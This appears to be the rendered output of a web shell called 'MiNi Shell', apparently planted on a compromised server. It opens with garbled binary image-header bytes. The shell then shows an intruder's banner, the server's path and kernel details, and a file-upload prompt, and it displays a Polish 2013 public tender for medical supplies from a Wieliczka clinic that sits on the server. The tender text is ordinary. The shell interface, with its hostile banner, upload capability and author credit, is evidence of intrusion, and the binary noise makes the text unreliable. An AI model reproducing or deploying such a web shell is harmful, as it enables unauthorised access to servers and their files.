JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130131/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130131/43500-N-2013.html

<p class="kh_header"><b>Wieliczka: Dostawę materiałów medycznych</b><br>
<b>Numer ogłoszenia: 43500 - 2013; data zamieszczenia: 31.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zespół Lecznictwa Otwartego , ul. Szponara 20, 32-020 Wieliczka, woj. małopolskie, tel. 012 2782824, faks 012 2782824.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzlo.wieliczka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawę materiałów medycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Dostawa materiałów medycznych jednorazowego użytku. Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowi:
Zadanie częściowe nr: 1. Dostawa materiałów  medycznych  
Wspólny Słownik Zamówień:33140000-3 -Materiały medyczne
 - pakiet 1 - materiały opatrunkowe
Wspólny Słownik Zamówień: 33141110-4 - Opatrunki 
Opis: Przedmiotem zamówienia w tym zadaniu jest dostawa materiałów opatrunkowych
Szczegółowy wykaz stanowi załącznik do SIWZ - formularz cenowy
Oznaczenie typu w formularzu cenowym ma znaczenie informacyjne podkreślające, iż oferowane materiały opatrunkowe nie mogą być gorsze niż, wymienione w formularzu cenowym stanowiącym załącznik do specyfikacji.
Wykonawca zobowiązany jest do załączenia do oferty dla wszystkich pozycji kosztorysu deklaracji zgodności CE,
Zamawiający nie dopuszcza składania ofert wariantowych. 
Zadanie częściowe nr 2. Dostawa materiałów, medycznych   - pakiet 2 - igły i strzykawki
Wspólny Słownik Zamówień: 33141320-9 - Igły medyczne, 33141310-6 - Strzykawki 
Opis: Przedmiotem zamówienia w tym zadaniu jest dostawa igieł i strzykawek
Szczegółowy wykaz stanowi załącznik do SIWZ - formularz cenowy
Oznaczenie typu w formularzu cenowym ma znaczenie informacyjne podkreślające, iż oferowane igły i strzykawki nie mogą być gorsze niż wymienione w formularzu cenowym stanowiącym załącznik do specyfikacji.
Wykonawca zobowiązany jest do załączenia do oferty dla wszystkich pozycji kosztorysu deklaracji zgodności CE oraz dla wszystkich pozycji dołączyć dokument: np. kartę katalogową lub folder katalogowy lub kartę charakterystyki produktu wydany przez producenta
Zamawiający nie dopuszcza składania ofert wariantowych. 
Zadanie częściowe nr 3. Dostawa materiałów  medycznych - pakiet 3 - rękawice diagnostyczne i chirurgiczne
Wspólny Słownik Zamówień: 184243000; 33141420-0 - Rękawice diagnostyczne i chirurgiczne 
Opis: Przedmiotem zamówienia w tym zadaniu jest dostawa rękawic chirurgicznych
Szczegółowy wykaz stanowi załącznik do SIWZ - formularz cenowy
Oznaczenie typu w formularzu cenowym ma znaczenie informacyjne podkreślające, iż oferowane rękawice chirurgiczne nie mogą być gorsze niż wymienione w formularzu cenowym stanowiącym załącznik do specyfikacji.
Wykonawca zobowiązany jest do załączenia do oferty dla wszystkich pozycji kosztorysu deklaracji zgodności CE,
Zamawiający nie dopuszcza składania ofert wariantowych. 
Części nie mogą być dzielone przez Wykonawców, oferty nie zawierające pełnego zakresu przedmiotu zamówienia określonego w zadaniu częściowym zostaną odrzucone..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.14.00.00-3, 33.14.11.10-4, 33.14.13.20-9, 33.14.13.10-6, 33.14.14.20-0, 18.42.43.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiajacy nie określa szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">DEKLARACJA ZGODNOŚCI  CE (opracowana zgodnie z normą EN 45014)</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spzlo.wieliczka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zespół Lecznictwa Otwartego w Wieliczce ul. Szpunara 20 32-020 Wieliczka,  Dział Administracji, pokój nr: 115.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.02.2013 godzina 10:00, miejsce: Samodzielny Publiczny Zespół Lecznictwa Otwartego w Wieliczce ul. Szpunara 20 32-020 Wieliczka,  Dział Administracji, pokój nr: 115.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dostawa materiałów opatrunkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Wata opat.bawełniano- viskozowa 	 	200g	szt.	250
2	Gaza opat. wyjałowiona  17nitkowa1mx1m	 	 	szt.	450
3	Gaza opt.wyjałowiona 17 nitkowa 1(2mx1)2m	 	 	szt	100
4	Gaza niej. w m/bież 	 	100mx 0.90m	op.	4
5	Kompresy niejałowe z gazy 13 nitkowej.12 warst.5cmx5cmx500 	 	500szt	op.	70
6	Kompresy niejałowe.z gazy 13 nitkowej 12warst.7cmx7cmx500 	 	500szt	op	20
7	Kompresy niej.z gazy 13 nitkowej 12warst 9cmx9cmx500 	 	500szt.	op.	35
8	Lignina rolki	 	150g	szt	1000
9	Lignina płaty	 	5kg	op	15
10	Kompresy jałowe z gazy 17-nitkowej12warstw 9cmx9cmx3  	 	 	szt	600
11	Kompresy jałowe.z gazy 17 nitkowej  12warst.      7cmx7cmx3	 	 	szt	100
12	 Kompresy jałowe z gazy 17 nitkowej12warst. 5cmx5cmx3    	 	 	szt	220
13	Opaska dziana wiskozowa 4mx10cm	 	 	szt	3000
14	Opaska dziana wiskozowa 4mx15cm	 	 	szt	2600
15	Opaska elastyczna z zapinką15cmx4m	 	a 1	szt	120
16	Opaska dziana wiskozowa 4mx 5cm	 	 	szt	600
17	Plaster z opatrunkiem na włókninie z klejem akrylowym hipoalergiczny 10cmx8cm x100	 	100szt.	op	20
18	Włókninowa taśma samoprzylepna  20cmx10cm	 	 	op	4
19	Plaster włókninowy z opatrunkiem 6cmx1m	 	 	op	200
20	Hypoalergiczny przylepiec włókniniowy 5mx2.5cm	 	 	szt	250
21	Hypoalergiczny przylepiec włókniniowy 5mx1,25cm 	 	 	szt	150
22	Opatrunek wlókniniowy do mocowania kaniul hipoalergiczny 7.6cmx5.1cm 	 	50szt.	op	20
23	Sterylne paski do zamykania ran 6mmx38mm zielone	 	 	szt	50
24	Sterylne paski do zamykania ran 6mmx75mm czerwone	 	 	szt	50
25	Plastry poinekcyjne z nacięciem co 2cm  5x4m	 	 	op	50
26	Uniwersalny przylepiec tkainowy  5mx5cm	 	 	szt	20
27	Opaska gipsowa szybkowiążąca  czas wiązania 6min 12cmx3m	 	12xA 2	Karton	30
28	Opaska gipsowa szybkowiążąca  czas wiązania 6min 15cmx4m	 	10xA 2	Karton	45
29	Elastyczna siatka opatrunkowa typu np.  CODOFIX 10X1M	 	 	szt	14
30	Elastyczna siatka opatrunkowa typu np. CODOFIX 6X1M	 	 	szt	12
31	Bandaż podgipsowy 100% wiskoza  natural 10cmx300cm	 	12szt	op.	24
32	Bandaż podggipsowy100% wiskoza natural 15cmx300cm	 	12szt	op.	25
33	Bandaż podgipsowy100% wiskoza  natural 20cmx300cm	 	12szt	op.	25
34	Gaziki  jałowe nasączone  70% alkocholem izopropylowym. Rozmiar XL (9cmx12,5cm) 	 	100szt.	op.	450
35	Opatrunek włókninowym wkładem chłonnym typu Fixopore S:rozmiar 15x8(cm)		50 szt.	op.	3
36	Opatrunek włókninowym wkładem chłonnym typu Fixopore S:rozmiar 10x20(cm)		50 szt	op.	3.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.10-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dostawa igieł i strzykawek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> STRZYKAWKI dwuczęściowe 1op.=100 szt ( nazwa własna producenta lub logo na cylindrze strzykawki, wymagane kolorystyczne zabarwienie tłoka strzykawki, czytelna skala tłoka, materiały użyte do produkcji nie zawierają lateksu, opakowanie typu blister: folia-papier)	 	 	 	 
Strzykawki 2ml	 	100szt	op.	180
Strzykawka 5ml 	 	100szt.	op.	200
Strzykawka 10ml 	 	100 szt	op.	220
Strzykawka 20ml  	 	100 szt.	op.	10
Strzykawka 1ml tubrkulina	 	100szt	op.	2
Strzykawka j.u. 100ml j.u. Typu Janeta	 	1szt	szt	200
IGŁY typu Terumo; 1op.= 100 szt ( rozmiar igły, data ważności, producent, nr serii, znak CE na każdym jednostkowym opakowaniu igły, rozmiary igieł za pomocą koloru konektora, opakowanie typu blister: folia-papier) ultra ostre ostrze typu Lancet Point wykonane z wysokiej klasy stali nierdzewnej.	 	 	 	 
Igły 0,45x16  	 	100szt	op	30
Igły 0,5x25   	 	100szt.	op.	150
Igły 0.6x25    	 	100szt.	op.	100
Igły 0.7x30    	 	100szt.	op	150
Igły 0.8x40    	 	100szt.	op	380
Igły 0.9x40    	 	100szt	op	124
Igły 1.1x40     	 	100szt.	op	25
Igły 1.2x40     	 	100szt.	op	120
Igly 2.1x40     	 	100szt	op	5
WENFLONY	 	 	 	 
niebieski	 	50szt	op	12
różowy	 	50szt	op	6
zielone	 	50szt	op	1
Przyrząd do infuzji, jednorazowego użytku, sterylny, niepirogenny,nietoksyczny, wolny od ftalanów DEHP, opakowanie typu blister, na opakowaniu jednostkowym dane:data ważności, znak CE, producent. 1 op.= 1 szt.	 	1szt	op	500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.13.20-9, 33.14.13.10-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dostawa rękawic diagnostycznych i chirurgicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Rękawice diagnostyczne, lateksowe niejałowe lekko pudrowane; pakowane po 100 szt; łatwo nakładające się; dobrze przylegające do ręki;  mocne, nie ulegające uszkodzeniu przy wyjmowaniu z opakowania; kształt uniwersalny, pasujące na prawą i lewą dłoń; dobrze przewodzące bodźce dotykowe o gramaturze od 5,3 do 5,5; wskażnik AQL mniejsz lub równe 1,5 rant rolowany; rozmiar  	 	100szt	op	 
a	XS	 	 	 	100
b	S	 	 	 	30
c	M	 	 	 	600
2	Rękawice diagnostyczne, lateksowe niejałowe;  bezpudrowe; pakowane po 100szt; o niskiej zawartości protein; łatwo nakładające się; dobrze przylegające do ręki;  mocne, nie ulegające uszkodzeniu przy wyjmowaniu z opakowania; kształt uniwersalny, pasujące na prawą i lewą dłoń; wskaźnik AQL mniejsze lub równe 1,5; rant rolowany; rozmiar .	 	100szt	op.	 
a	XS	 	 	 	100
b	S	 	 	 	30
c	M	 	 	 	450
 3	Rękawice winylowe, bezpudrowe niesterylne, pakowane po 100 szt w op.  jednorazowego użytku, kształt uniwersalny pasujący na prawą i lewą dłoń, zakończone rantem,  rozmiar 	 	100szt.	op.	 
a	S	 	 	 	90
b	M	 	 	 	40
c	L				90
4	Rękawice nitrylowe; niejałowe; bezpudrowe; pakowane po 100 szt;łatwo nakładajęce się; dobrze przylegające do ręki; mocne, nie ulegające uszkodzeniu przy wyjmowaniu z opakowania; kształt uniwersalny, pasujące na prawą i lewą dłoń; wskaźnik AQL mniejsze lub równe 1,5; rant rolowany; rozmiar...	 	100 szt	op.	 
a	S	 	 	 	60
b	M	 	 	 	120
c	L	 	 	 	100
5	Rękawice lateksowe chirurgiczne sterylne, całkowicie bezpudrowe, pakowane po 50 par; ubogie w proteiny i środki drażniące; dobrze przylegające do ręki; mocne nie ulegające uszkodzeniu przy wyjmowaniu z opakowania; wskaźnik AQL mniejsze lub równe 1,5; rant rolowany; 	 	50 par	op.	
a	Rozmiar 7.5	 	 	 	26
b	Rozmiar 8				12
6	Rękawice foliowe (folia HDPE), bezpudrowe, niesterylne, pasujące na prawą i lewą dłoń, łatwe do założenie i ściągnięcia z dłoni; rozmiar 	 	100szt	op	 
a	M	 	 	 	24
b	L	 	 	 	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.14.20-0, 18.42.43.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com